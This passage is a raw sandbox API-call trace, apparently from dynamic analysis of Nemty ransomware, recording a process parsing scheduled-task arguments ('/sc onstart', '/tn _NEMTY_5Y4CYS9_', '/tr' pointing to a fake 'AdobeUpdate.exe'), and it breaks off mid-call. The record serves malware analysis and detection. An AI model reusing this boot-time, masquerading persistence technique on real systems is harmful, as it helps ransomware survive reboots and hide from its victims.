[0071.498] lstrlenW (lpString="|ru|") returned 4 [0071.498] lstrlenW (lpString="|sc|") returned 4 [0071.498] StrStrIW (lpFirst="|ru|", lpSrch="|sc|") returned 0x0 [0071.498] SetLastError (dwErrCode=0x490) [0071.498] lstrlenW (lpString="rp") returned 2 [0071.498] lstrlenW (lpString="rp") returned 2 [0071.498] _memicmp (_Buf1=0x494d80, _Buf2=0xfb1ed8, _Size=0x7) returned 0 [0071.498] lstrlenW (lpString="sc") returned 2 [0071.498] _memicmp (_Buf1=0x494db0, _Buf2=0xfb1ed8, _Size=0x7) returned 0 [0071.498] _vsnwprintf (in: _Buffer=0x495408, _BufferCount=0x5, _Format="|%s|", _ArgList=0x13cbd4 | out: _Buffer="|rp|") returned 4 [0071.498] _vsnwprintf (in: _Buffer=0x4953c8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x13cbd4 | out: _Buffer="|sc|") returned 4 [0071.498] lstrlenW (lpString="|rp|") returned 4 [0071.498] lstrlenW (lpString="|sc|") returned 4 [0071.498] StrStrIW (lpFirst="|rp|", lpSrch="|sc|") returned 0x0 [0071.498] SetLastError (dwErrCode=0x490) [0071.498] lstrlenW (lpString="sc") returned 2 [0071.498] lstrlenW (lpString="sc") returned 2 [0071.498] _memicmp (_Buf1=0x494d80, _Buf2=0xfb1ed8, _Size=0x7) returned 0 [0071.498] lstrlenW (lpString="sc") returned 2 [0071.498] _memicmp (_Buf1=0x494db0, _Buf2=0xfb1ed8, _Size=0x7) returned 0 [0071.498] _vsnwprintf (in: _Buffer=0x495408, _BufferCount=0x5, _Format="|%s|", _ArgList=0x13cbd4 | out: _Buffer="|sc|") returned 4 [0071.498] _vsnwprintf (in: _Buffer=0x4953c8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x13cbd4 | out: _Buffer="|sc|") returned 4 [0071.498] lstrlenW (lpString="|sc|") returned 4 [0071.499] lstrlenW (lpString="|sc|") returned 4 [0071.499] StrStrIW (lpFirst="|sc|", lpSrch="|sc|") returned="|sc|" [0071.499] SetLastError (dwErrCode=0x0) [0071.499] SetLastError (dwErrCode=0x0) [0071.499] lstrlenW (lpString="onstart") returned 7 [0071.499] lstrlenW (lpString="-/") returned 2 [0071.499] StrChrIW (lpStart="-/", wMatch=0x6f) returned 0x0 [0071.499] SetLastError (dwErrCode=0x490) [0071.499] SetLastError (dwErrCode=0x490) [0071.499] SetLastError (dwErrCode=0x0) [0071.499] lstrlenW (lpString="onstart") returned 7 [0071.499] StrChrIW (lpStart="onstart", wMatch=0x3a) returned 0x0 [0071.499] SetLastError (dwErrCode=0x490) [0071.499] SetLastError (dwErrCode=0x0) [0071.499] GetProcessHeap () returned 0x480000 [0071.499] RtlAllocateHeap (HeapHandle=0x480000, Flags=0xc, Size=0x10) returned 0x494d98 [0071.499] _memicmp (_Buf1=0x494d98, _Buf2=0xfb1ed8, _Size=0x7) returned 0 [0071.499] lstrlenW (lpString="onstart") returned 7 [0071.499] GetProcessHeap () returned 0x480000 [0071.499] RtlAllocateHeap (HeapHandle=0x480000, Flags=0xc, Size=0x10) returned 0x494e10 [0071.499] lstrlenW (lpString="onstart") returned 7 [0071.499] lstrlenW (lpString=" \x09") returned 2 [0071.499] StrChrW (lpStart=" \x09", wMatch=0x6f) returned 0x0 [0071.499] StrChrW (lpStart=" \x09", wMatch=0x6f) returned 0x0 [0071.499] StrChrW (lpStart=" \x09", wMatch=0x6e) returned 0x0 [0071.499] StrChrW (lpStart=" \x09", wMatch=0x73) returned 0x0 [0071.499] StrChrW (lpStart=" \x09", wMatch=0x74) returned 0x0 [0071.499] StrChrW (lpStart=" \x09", wMatch=0x61) returned 0x0 [0071.499] StrChrW (lpStart=" \x09", wMatch=0x72) returned 0x0 [0071.499] StrChrW (lpStart=" \x09", wMatch=0x74) returned 0x0 [0071.499] GetLastError () returned 0x0 [0071.499] lstrlenW (lpString="onstart") returned 7 [0071.499] lstrlenW (lpString="onstart") returned 7 [0071.499] SetLastError (dwErrCode=0x0) [0071.499] SetLastError (dwErrCode=0x0) [0071.499] lstrlenW (lpString="/tn") returned 3 [0071.499] lstrlenW (lpString="-/") returned 2 [0071.499] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/" [0071.499] lstrlenW (lpString="create") returned 6 [0071.500] lstrlenW (lpString="create") returned 6 [0071.500] _memicmp (_Buf1=0x494d80, _Buf2=0xfb1ed8, _Size=0x7) returned 0 [0071.500] lstrlenW (lpString="tn") returned 2 [0071.500] _memicmp (_Buf1=0x494db0, _Buf2=0xfb1ed8, _Size=0x7) returned 0 [0071.500] _vsnwprintf (in: _Buffer=0x495408, _BufferCount=0x9, _Format="|%s|", _ArgList=0x13cbd4 | out: _Buffer="|create|") returned 8 [0071.500] _vsnwprintf (in: _Buffer=0x4953c8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x13cbd4 | out: _Buffer="|tn|") returned 4 [0071.500] lstrlenW (lpString="|create|") returned 8 [0071.500] lstrlenW (lpString="|tn|") returned 4 [0071.500] StrStrIW (lpFirst="|create|", lpSrch="|tn|") returned 0x0 [0071.500] SetLastError (dwErrCode=0x490) [0071.500] lstrlenW (lpString="?") returned 1 [0071.500] lstrlenW (lpString="?") returned 1 [0071.500] _memicmp (_Buf1=0x494d80, _Buf2=0xfb1ed8, _Size=0x7) returned 0 [0071.500] lstrlenW (lpString="tn") returned 2 [0071.500] _memicmp (_Buf1=0x494db0, _Buf2=0xfb1ed8, _Size=0x7) returned 0 [0071.500] _vsnwprintf (in: _Buffer=0x495408, _BufferCount=0x4, _Format="|%s|", _ArgList=0x13cbd4 | out: _Buffer="|?|") returned 3 [0071.500] _vsnwprintf (in: _Buffer=0x4953c8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x13cbd4 | out: _Buffer="|tn|") returned 4 [0071.500] lstrlenW (lpString="|?|") returned 3 [0071.500] lstrlenW (lpString="|tn|") returned 4 [0071.500] SetLastError (dwErrCode=0x490) [0071.500] lstrlenW (lpString="s") returned 1 [0071.500] lstrlenW (lpString="s") returned 1 [0071.500] _memicmp (_Buf1=0x494d80, _Buf2=0xfb1ed8, _Size=0x7) returned 0 [0071.500] lstrlenW (lpString="tn") returned 2 [0071.500] _memicmp (_Buf1=0x494db0, _Buf2=0xfb1ed8, _Size=0x7) returned 0 [0071.500] _vsnwprintf (in: _Buffer=0x495408, _BufferCount=0x4, _Format="|%s|", _ArgList=0x13cbd4 | out: _Buffer="|s|") returned 3 [0071.500] _vsnwprintf (in: _Buffer=0x4953c8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x13cbd4 | out: _Buffer="|tn|") returned 4 [0071.500] lstrlenW (lpString="|s|") returned 3 [0071.500] lstrlenW (lpString="|tn|") returned 4 [0071.500] SetLastError (dwErrCode=0x490) [0071.500] lstrlenW (lpString="u") returned 1 [0071.500] lstrlenW (lpString="u") returned 1 [0071.500] _memicmp (_Buf1=0x494d80, _Buf2=0xfb1ed8, _Size=0x7) returned 0 [0071.501] lstrlenW (lpString="tn") returned 2 [0071.501] _memicmp (_Buf1=0x494db0, _Buf2=0xfb1ed8, _Size=0x7) returned 0 [0071.501] _vsnwprintf (in: _Buffer=0x495408, _BufferCount=0x4, _Format="|%s|", _ArgList=0x13cbd4 | out: _Buffer="|u|") returned 3 [0071.501] _vsnwprintf (in: _Buffer=0x4953c8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x13cbd4 | out: _Buffer="|tn|") returned 4 [0071.501] lstrlenW (lpString="|u|") returned 3 [0071.501] lstrlenW (lpString="|tn|") returned 4 [0071.501] SetLastError (dwErrCode=0x490) [0071.501] lstrlenW (lpString="p") returned 1 [0071.501] lstrlenW (lpString="p") returned 1 [0071.501] _memicmp (_Buf1=0x494d80, _Buf2=0xfb1ed8, _Size=0x7) returned 0 [0071.501] lstrlenW (lpString="tn") returned 2 [0071.501] _memicmp (_Buf1=0x494db0, _Buf2=0xfb1ed8, _Size=0x7) returned 0 [0071.501] _vsnwprintf (in: _Buffer=0x495408, _BufferCount=0x4, _Format="|%s|", _ArgList=0x13cbd4 | out: _Buffer="|p|") returned 3 [0071.501] _vsnwprintf (in: _Buffer=0x4953c8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x13cbd4 | out: _Buffer="|tn|") returned 4 [0071.501] lstrlenW (lpString="|p|") returned 3 [0071.501] lstrlenW (lpString="|tn|") returned 4 [0071.501] SetLastError (dwErrCode=0x490) [0071.501] lstrlenW (lpString="ru") returned 2 [0071.501] lstrlenW (lpString="ru") returned 2 [0071.501] _memicmp (_Buf1=0x494d80, _Buf2=0xfb1ed8, _Size=0x7) returned 0 [0071.501] lstrlenW (lpString="tn") returned 2 [0071.501] _memicmp (_Buf1=0x494db0, _Buf2=0xfb1ed8, _Size=0x7) returned 0 [0071.501] _vsnwprintf (in: _Buffer=0x495408, _BufferCount=0x5, _Format="|%s|", _ArgList=0x13cbd4 | out: _Buffer="|ru|") returned 4 [0071.501] _vsnwprintf (in: _Buffer=0x4953c8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x13cbd4 | out: _Buffer="|tn|") returned 4 [0071.501] lstrlenW (lpString="|ru|") returned 4 [0071.501] lstrlenW (lpString="|tn|") returned 4 [0071.501] StrStrIW (lpFirst="|ru|", lpSrch="|tn|") returned 0x0 [0071.501] SetLastError (dwErrCode=0x490) [0071.501] lstrlenW (lpString="rp") returned 2 [0071.501] lstrlenW (lpString="rp") returned 2 [0071.501] _memicmp (_Buf1=0x494d80, _Buf2=0xfb1ed8, _Size=0x7) returned 0 [0071.501] lstrlenW (lpString="tn") returned 2 [0071.501] _memicmp (_Buf1=0x494db0, _Buf2=0xfb1ed8, _Size=0x7) returned 0 [0071.502] _vsnwprintf (in: _Buffer=0x495408, _BufferCount=0x5, _Format="|%s|", _ArgList=0x13cbd4 | out: _Buffer="|rp|") returned 4 [0071.502] _vsnwprintf (in: _Buffer=0x4953c8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x13cbd4 | out: _Buffer="|tn|") returned 4 [0071.502] lstrlenW (lpString="|rp|") returned 4 [0071.502] lstrlenW (lpString="|tn|") returned 4 [0071.502] StrStrIW (lpFirst="|rp|", lpSrch="|tn|") returned 0x0 [0071.502] SetLastError (dwErrCode=0x490) [0071.502] lstrlenW (lpString="sc") returned 2 [0071.502] lstrlenW (lpString="sc") returned 2 [0071.502] _memicmp (_Buf1=0x494d80, _Buf2=0xfb1ed8, _Size=0x7) returned 0 [0071.502] lstrlenW (lpString="tn") returned 2 [0071.502] _memicmp (_Buf1=0x494db0, _Buf2=0xfb1ed8, _Size=0x7) returned 0 [0071.502] _vsnwprintf (in: _Buffer=0x495408, _BufferCount=0x5, _Format="|%s|", _ArgList=0x13cbd4 | out: _Buffer="|sc|") returned 4 [0071.502] _vsnwprintf (in: _Buffer=0x4953c8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x13cbd4 | out: _Buffer="|tn|") returned 4 [0071.502] lstrlenW (lpString="|sc|") returned 4 [0071.502] lstrlenW (lpString="|tn|") returned 4 [0071.502] StrStrIW (lpFirst="|sc|", lpSrch="|tn|") returned 0x0 [0071.502] SetLastError (dwErrCode=0x490) [0071.502] lstrlenW (lpString="mo") returned 2 [0071.502] lstrlenW (lpString="mo") returned 2 [0071.502] _memicmp (_Buf1=0x494d80, _Buf2=0xfb1ed8, _Size=0x7) returned 0 [0071.502] lstrlenW (lpString="tn") returned 2 [0071.502] _memicmp (_Buf1=0x494db0, _Buf2=0xfb1ed8, _Size=0x7) returned 0 [0071.502] _vsnwprintf (in: _Buffer=0x495408, _BufferCount=0x5, _Format="|%s|", _ArgList=0x13cbd4 | out: _Buffer="|mo|") returned 4 [0071.502] _vsnwprintf (in: _Buffer=0x4953c8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x13cbd4 | out: _Buffer="|tn|") returned 4 [0071.502] lstrlenW (lpString="|mo|") returned 4 [0071.502] lstrlenW (lpString="|tn|") returned 4 [0071.502] StrStrIW (lpFirst="|mo|", lpSrch="|tn|") returned 0x0 [0071.502] SetLastError (dwErrCode=0x490) [0071.502] lstrlenW (lpString="d") returned 1 [0071.502] lstrlenW (lpString="d") returned 1 [0071.502] _memicmp (_Buf1=0x494d80, _Buf2=0xfb1ed8, _Size=0x7) returned 0 [0071.502] lstrlenW (lpString="tn") returned 2 [0071.502] _memicmp (_Buf1=0x494db0, _Buf2=0xfb1ed8, _Size=0x7) returned 0 [0071.503] _vsnwprintf (in: _Buffer=0x495408, _BufferCount=0x4, _Format="|%s|", _ArgList=0x13cbd4 | out: _Buffer="|d|") returned 3 [0071.503] _vsnwprintf (in: _Buffer=0x4953c8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x13cbd4 | out: _Buffer="|tn|") returned 4 [0071.503] lstrlenW (lpString="|d|") returned 3 [0071.503] lstrlenW (lpString="|tn|") returned 4 [0071.503] SetLastError (dwErrCode=0x490) [0071.503] lstrlenW (lpString="m") returned 1 [0071.503] lstrlenW (lpString="m") returned 1 [0071.503] _memicmp (_Buf1=0x494d80, _Buf2=0xfb1ed8, _Size=0x7) returned 0 [0071.503] lstrlenW (lpString="tn") returned 2 [0071.503] _memicmp (_Buf1=0x494db0, _Buf2=0xfb1ed8, _Size=0x7) returned 0 [0071.503] _vsnwprintf (in: _Buffer=0x495408, _BufferCount=0x4, _Format="|%s|", _ArgList=0x13cbd4 | out: _Buffer="|m|") returned 3 [0071.503] _vsnwprintf (in: _Buffer=0x4953c8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x13cbd4 | out: _Buffer="|tn|") returned 4 [0071.503] lstrlenW (lpString="|m|") returned 3 [0071.503] lstrlenW (lpString="|tn|") returned 4 [0071.503] SetLastError (dwErrCode=0x490) [0071.503] lstrlenW (lpString="i") returned 1 [0071.503] lstrlenW (lpString="i") returned 1 [0071.503] _memicmp (_Buf1=0x494d80, _Buf2=0xfb1ed8, _Size=0x7) returned 0 [0071.503] lstrlenW (lpString="tn") returned 2 [0071.503] _memicmp (_Buf1=0x494db0, _Buf2=0xfb1ed8, _Size=0x7) returned 0 [0071.503] _vsnwprintf (in: _Buffer=0x495408, _BufferCount=0x4, _Format="|%s|", _ArgList=0x13cbd4 | out: _Buffer="|i|") returned 3 [0071.503] _vsnwprintf (in: _Buffer=0x4953c8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x13cbd4 | out: _Buffer="|tn|") returned 4 [0071.503] lstrlenW (lpString="|i|") returned 3 [0071.503] lstrlenW (lpString="|tn|") returned 4 [0071.503] SetLastError (dwErrCode=0x490) [0071.503] lstrlenW (lpString="tn") returned 2 [0071.503] lstrlenW (lpString="tn") returned 2 [0071.503] _memicmp (_Buf1=0x494d80, _Buf2=0xfb1ed8, _Size=0x7) returned 0 [0071.503] lstrlenW (lpString="tn") returned 2 [0071.503] _memicmp (_Buf1=0x494db0, _Buf2=0xfb1ed8, _Size=0x7) returned 0 [0071.503] _vsnwprintf (in: _Buffer=0x495408, _BufferCount=0x5, _Format="|%s|", _ArgList=0x13cbd4 | out: _Buffer="|tn|") returned 4 [0071.503] _vsnwprintf (in: _Buffer=0x4953c8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x13cbd4 | out: _Buffer="|tn|") returned 4 [0071.503] lstrlenW (lpString="|tn|") returned 4 [0071.503] lstrlenW (lpString="|tn|") returned 4 [0071.504] StrStrIW (lpFirst="|tn|", lpSrch="|tn|") returned="|tn|" [0071.504] SetLastError (dwErrCode=0x0) [0071.504] SetLastError (dwErrCode=0x0) [0071.504] lstrlenW (lpString="_NEMTY_5Y4CYS9_") returned 15 [0071.504] lstrlenW (lpString="-/") returned 2 [0071.504] StrChrIW (lpStart="-/", wMatch=0x5f) returned 0x0 [0071.504] SetLastError (dwErrCode=0x490) [0071.504] SetLastError (dwErrCode=0x490) [0071.504] SetLastError (dwErrCode=0x0) [0071.504] lstrlenW (lpString="_NEMTY_5Y4CYS9_") returned 15 [0071.504] StrChrIW (lpStart="_NEMTY_5Y4CYS9_", wMatch=0x3a) returned 0x0 [0071.504] SetLastError (dwErrCode=0x490) [0071.504] SetLastError (dwErrCode=0x0) [0071.504] lstrlenW (lpString="_NEMTY_5Y4CYS9_") returned 15 [0071.504] SetLastError (dwErrCode=0x0) [0071.504] SetLastError (dwErrCode=0x0) [0071.504] lstrlenW (lpString="/tr") returned 3 [0071.504] lstrlenW (lpString="-/") returned 2 [0071.504] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/" [0071.504] lstrlenW (lpString="create") returned 6 [0071.504] lstrlenW (lpString="create") returned 6 [0071.504] _memicmp (_Buf1=0x494d80, _Buf2=0xfb1ed8, _Size=0x7) returned 0 [0071.504] lstrlenW (lpString="tr") returned 2 [0071.504] _memicmp (_Buf1=0x494db0, _Buf2=0xfb1ed8, _Size=0x7) returned 0 [0071.504] _vsnwprintf (in: _Buffer=0x495408, _BufferCount=0x9, _Format="|%s|", _ArgList=0x13cbd4 | out: _Buffer="|create|") returned 8 [0071.504] _vsnwprintf (in: _Buffer=0x4953c8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x13cbd4 | out: _Buffer="|tr|") returned 4 [0071.504] lstrlenW (lpString="|create|") returned 8 [0071.504] lstrlenW (lpString="|tr|") returned 4 [0071.504] StrStrIW (lpFirst="|create|", lpSrch="|tr|") returned 0x0 [0071.504] SetLastError (dwErrCode=0x490) [0071.504] lstrlenW (lpString="?") returned 1 [0071.504] lstrlenW (lpString="?") returned 1 [0071.504] _memicmp (_Buf1=0x494d80, _Buf2=0xfb1ed8, _Size=0x7) returned 0 [0071.504] lstrlenW (lpString="tr") returned 2 [0071.504] _memicmp (_Buf1=0x494db0, _Buf2=0xfb1ed8, _Size=0x7) returned 0 [0071.505] _vsnwprintf (in: _Buffer=0x495408, _BufferCount=0x4, _Format="|%s|", _ArgList=0x13cbd4 | out: _Buffer="|?|") returned 3 [0071.505] _vsnwprintf (in: _Buffer=0x4953c8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x13cbd4 | out: _Buffer="|tr|") returned 4 [0071.505] lstrlenW (lpString="|?|") returned 3 [0071.505] lstrlenW (lpString="|tr|") returned 4 [0071.505] SetLastError (dwErrCode=0x490) [0071.505] lstrlenW (lpString="s") returned 1 [0071.505] lstrlenW (lpString="s") returned 1 [0071.505] _memicmp (_Buf1=0x494d80, _Buf2=0xfb1ed8, _Size=0x7) returned 0 [0071.505] lstrlenW (lpString="tr") returned 2 [0071.505] _memicmp (_Buf1=0x494db0, _Buf2=0xfb1ed8, _Size=0x7) returned 0 [0071.505] _vsnwprintf (in: _Buffer=0x495408, _BufferCount=0x4, _Format="|%s|", _ArgList=0x13cbd4 | out: _Buffer="|s|") returned 3 [0071.505] _vsnwprintf (in: _Buffer=0x4953c8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x13cbd4 | out: _Buffer="|tr|") returned 4 [0071.505] lstrlenW (lpString="|s|") returned 3 [0071.505] lstrlenW (lpString="|tr|") returned 4 [0071.505] SetLastError (dwErrCode=0x490) [0071.505] lstrlenW (lpString="u") returned 1 [0071.505] lstrlenW (lpString="u") returned 1 [0071.505] _memicmp (_Buf1=0x494d80, _Buf2=0xfb1ed8, _Size=0x7) returned 0 [0071.505] lstrlenW (lpString="tr") returned 2 [0071.505] _memicmp (_Buf1=0x494db0, _Buf2=0xfb1ed8, _Size=0x7) returned 0 [0071.505] _vsnwprintf (in: _Buffer=0x495408, _BufferCount=0x4, _Format="|%s|", _ArgList=0x13cbd4 | out: _Buffer="|u|") returned 3 [0071.505] _vsnwprintf (in: _Buffer=0x4953c8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x13cbd4 | out: _Buffer="|tr|") returned 4 [0071.505] lstrlenW (lpString="|u|") returned 3 [0071.505] lstrlenW (lpString="|tr|") returned 4 [0071.505] SetLastError (dwErrCode=0x490) [0071.505] lstrlenW (lpString="p") returned 1 [0071.505] lstrlenW (lpString="p") returned 1 [0071.505] _memicmp (_Buf1=0x494d80, _Buf2=0xfb1ed8, _Size=0x7) returned 0 [0071.505] lstrlenW (lpString="tr") returned 2 [0071.505] _memicmp (_Buf1=0x494db0, _Buf2=0xfb1ed8, _Size=0x7) returned 0 [0071.505] _vsnwprintf (in: _Buffer=0x495408, _BufferCount=0x4, _Format="|%s|", _ArgList=0x13cbd4 | out: _Buffer="|p|") returned 3 [0071.505] _vsnwprintf (in: _Buffer=0x4953c8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x13cbd4 | out: _Buffer="|tr|") returned 4 [0071.505] lstrlenW (lpString="|p|") returned 3 [0071.505] lstrlenW (lpString="|tr|") returned 4 [0071.506] SetLastError (dwErrCode=0x490) [0071.506] lstrlenW (lpString="ru") returned 2 [0071.506] lstrlenW (lpString="ru") returned 2 [0071.506] _memicmp (_Buf1=0x494d80, _Buf2=0xfb1ed8, _Size=0x7) returned 0 [0071.506] lstrlenW (lpString="tr") returned 2 [0071.506] _memicmp (_Buf1=0x494db0, _Buf2=0xfb1ed8, _Size=0x7) returned 0 [0071.506] _vsnwprintf (in: _Buffer=0x495408, _BufferCount=0x5, _Format="|%s|", _ArgList=0x13cbd4 | out: _Buffer="|ru|") returned 4 [0071.506] _vsnwprintf (in: _Buffer=0x4953c8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x13cbd4 | out: _Buffer="|tr|") returned 4 [0071.506] lstrlenW (lpString="|ru|") returned 4 [0071.506] lstrlenW (lpString="|tr|") returned 4 [0071.506] StrStrIW (lpFirst="|ru|", lpSrch="|tr|") returned 0x0 [0071.506] SetLastError (dwErrCode=0x490) [0071.506] lstrlenW (lpString="rp") returned 2 [0071.506] lstrlenW (lpString="rp") returned 2 [0071.506] _memicmp (_Buf1=0x494d80, _Buf2=0xfb1ed8, _Size=0x7) returned 0 [0071.506] lstrlenW (lpString="tr") returned 2 [0071.506] _memicmp (_Buf1=0x494db0, _Buf2=0xfb1ed8, _Size=0x7) returned 0 [0071.506] _vsnwprintf (in: _Buffer=0x495408, _BufferCount=0x5, _Format="|%s|", _ArgList=0x13cbd4 | out: _Buffer="|rp|") returned 4 [0071.506] _vsnwprintf (in: _Buffer=0x4953c8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x13cbd4 | out: _Buffer="|tr|") returned 4 [0071.506] lstrlenW (lpString="|rp|") returned 4 [0071.506] lstrlenW (lpString="|tr|") returned 4 [0071.506] StrStrIW (lpFirst="|rp|", lpSrch="|tr|") returned 0x0 [0071.506] SetLastError (dwErrCode=0x490) [0071.506] lstrlenW (lpString="sc") returned 2 [0071.506] lstrlenW (lpString="sc") returned 2 [0071.506] _memicmp (_Buf1=0x494d80, _Buf2=0xfb1ed8, _Size=0x7) returned 0 [0071.506] lstrlenW (lpString="tr") returned 2 [0071.506] _memicmp (_Buf1=0x494db0, _Buf2=0xfb1ed8, _Size=0x7) returned 0 [0071.506] _vsnwprintf (in: _Buffer=0x495408, _BufferCount=0x5, _Format="|%s|", _ArgList=0x13cbd4 | out: _Buffer="|sc|") returned 4 [0071.506] _vsnwprintf (in: _Buffer=0x4953c8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x13cbd4 | out: _Buffer="|tr|") returned 4 [0071.506] lstrlenW (lpString="|sc|") returned 4 [0071.506] lstrlenW (lpString="|tr|") returned 4 [0071.506] StrStrIW (lpFirst="|sc|", lpSrch="|tr|") returned 0x0 [0071.507] SetLastError (dwErrCode=0x490) [0071.507] lstrlenW (lpString="mo") returned 2 [0071.507] lstrlenW (lpString="mo") returned 2 [0071.507] _memicmp (_Buf1=0x494d80, _Buf2=0xfb1ed8, _Size=0x7) returned 0 [0071.507] lstrlenW (lpString="tr") returned 2 [0071.507] _memicmp (_Buf1=0x494db0, _Buf2=0xfb1ed8, _Size=0x7) returned 0 [0071.507] _vsnwprintf (in: _Buffer=0x495408, _BufferCount=0x5, _Format="|%s|", _ArgList=0x13cbd4 | out: _Buffer="|mo|") returned 4 [0071.507] _vsnwprintf (in: _Buffer=0x4953c8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x13cbd4 | out: _Buffer="|tr|") returned 4 [0071.507] lstrlenW (lpString="|mo|") returned 4 [0071.507] lstrlenW (lpString="|tr|") returned 4 [0071.507] StrStrIW (lpFirst="|mo|", lpSrch="|tr|") returned 0x0 [0071.507] SetLastError (dwErrCode=0x490) [0071.507] lstrlenW (lpString="d") returned 1 [0071.507] lstrlenW (lpString="d") returned 1 [0071.507] _memicmp (_Buf1=0x494d80, _Buf2=0xfb1ed8, _Size=0x7) returned 0 [0071.507] lstrlenW (lpString="tr") returned 2 [0071.507] _memicmp (_Buf1=0x494db0, _Buf2=0xfb1ed8, _Size=0x7) returned 0 [0071.507] _vsnwprintf (in: _Buffer=0x495408, _BufferCount=0x4, _Format="|%s|", _ArgList=0x13cbd4 | out: _Buffer="|d|") returned 3 [0071.507] _vsnwprintf (in: _Buffer=0x4953c8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x13cbd4 | out: _Buffer="|tr|") returned 4 [0071.507] lstrlenW (lpString="|d|") returned 3 [0071.507] lstrlenW (lpString="|tr|") returned 4 [0071.507] SetLastError (dwErrCode=0x490) [0071.507] lstrlenW (lpString="m") returned 1 [0071.507] lstrlenW (lpString="m") returned 1 [0071.507] _memicmp (_Buf1=0x494d80, _Buf2=0xfb1ed8, _Size=0x7) returned 0 [0071.507] lstrlenW (lpString="tr") returned 2 [0071.507] _memicmp (_Buf1=0x494db0, _Buf2=0xfb1ed8, _Size=0x7) returned 0 [0071.507] _vsnwprintf (in: _Buffer=0x495408, _BufferCount=0x4, _Format="|%s|", _ArgList=0x13cbd4 | out: _Buffer="|m|") returned 3 [0071.507] _vsnwprintf (in: _Buffer=0x4953c8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x13cbd4 | out: _Buffer="|tr|") returned 4 [0071.507] lstrlenW (lpString="|m|") returned 3 [0071.507] lstrlenW (lpString="|tr|") returned 4 [0071.507] SetLastError (dwErrCode=0x490) [0071.507] lstrlenW (lpString="i") returned 1 [0071.507] lstrlenW (lpString="i") returned 1 [0071.508] _memicmp (_Buf1=0x494d80, _Buf2=0xfb1ed8, _Size=0x7) returned 0 [0071.508] lstrlenW (lpString="tr") returned 2 [0071.508] _memicmp (_Buf1=0x494db0, _Buf2=0xfb1ed8, _Size=0x7) returned 0 [0071.508] _vsnwprintf (in: _Buffer=0x495408, _BufferCount=0x4, _Format="|%s|", _ArgList=0x13cbd4 | out: _Buffer="|i|") returned 3 [0071.508] _vsnwprintf (in: _Buffer=0x4953c8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x13cbd4 | out: _Buffer="|tr|") returned 4 [0071.508] lstrlenW (lpString="|i|") returned 3 [0071.508] lstrlenW (lpString="|tr|") returned 4 [0071.508] SetLastError (dwErrCode=0x490) [0071.508] lstrlenW (lpString="tn") returned 2 [0071.508] lstrlenW (lpString="tn") returned 2 [0071.508] _memicmp (_Buf1=0x494d80, _Buf2=0xfb1ed8, _Size=0x7) returned 0 [0071.508] lstrlenW (lpString="tr") returned 2 [0071.508] _memicmp (_Buf1=0x494db0, _Buf2=0xfb1ed8, _Size=0x7) returned 0 [0071.508] _vsnwprintf (in: _Buffer=0x495408, _BufferCount=0x5, _Format="|%s|", _ArgList=0x13cbd4 | out: _Buffer="|tn|") returned 4 [0071.508] _vsnwprintf (in: _Buffer=0x4953c8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x13cbd4 | out: _Buffer="|tr|") returned 4 [0071.508] lstrlenW (lpString="|tn|") returned 4 [0071.508] lstrlenW (lpString="|tr|") returned 4 [0071.508] StrStrIW (lpFirst="|tn|", lpSrch="|tr|") returned 0x0 [0071.508] SetLastError (dwErrCode=0x490) [0071.508] lstrlenW (lpString="tr") returned 2 [0071.508] lstrlenW (lpString="tr") returned 2 [0071.508] _memicmp (_Buf1=0x494d80, _Buf2=0xfb1ed8, _Size=0x7) returned 0 [0071.508] lstrlenW (lpString="tr") returned 2 [0071.508] _memicmp (_Buf1=0x494db0, _Buf2=0xfb1ed8, _Size=0x7) returned 0 [0071.508] _vsnwprintf (in: _Buffer=0x495408, _BufferCount=0x5, _Format="|%s|", _ArgList=0x13cbd4 | out: _Buffer="|tr|") returned 4 [0071.508] _vsnwprintf (in: _Buffer=0x4953c8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x13cbd4 | out: _Buffer="|tr|") returned 4 [0071.508] lstrlenW (lpString="|tr|") returned 4 [0071.508] lstrlenW (lpString="|tr|") returned 4 [0071.508] StrStrIW (lpFirst="|tr|", lpSrch="|tr|") returned="|tr|" [0071.508] SetLastError (dwErrCode=0x0) [0071.508] SetLastError (dwErrCode=0x0) [0071.508] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AdobeUpdate.exe") returned 45 [0071.508] lstrlenW (lpString="-/") returned 2 [0071.509] StrChrIW (lpStart="-/", wMatch=0x43) returned 0x0 [0071.509] SetLastError (dwErrCode=0x490) [0071.509] SetLastError (dwErrCode=0x490) [0071.509] SetLastError (dwErrCode=0x0) [0071.509] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AdobeUpdate.exe") returned 45 [0071.509] StrChrIW (lpStart="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AdobeUpdate.exe", wMatch=0x3a) returned=":\\Users\\5p5NrGJn0jS HALPmcxz\\AdobeUpdate.exe" [0071.509] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AdobeUpdate.exe") returned 45 [0071.509] _memicmp (_Buf1=0x494dc8, _Buf2=0xfb1ed8, _Size=0x7) returned 0 [0071.509] _memicmp (_Buf1=0x494df8, _Buf2=0xfb1ed8, 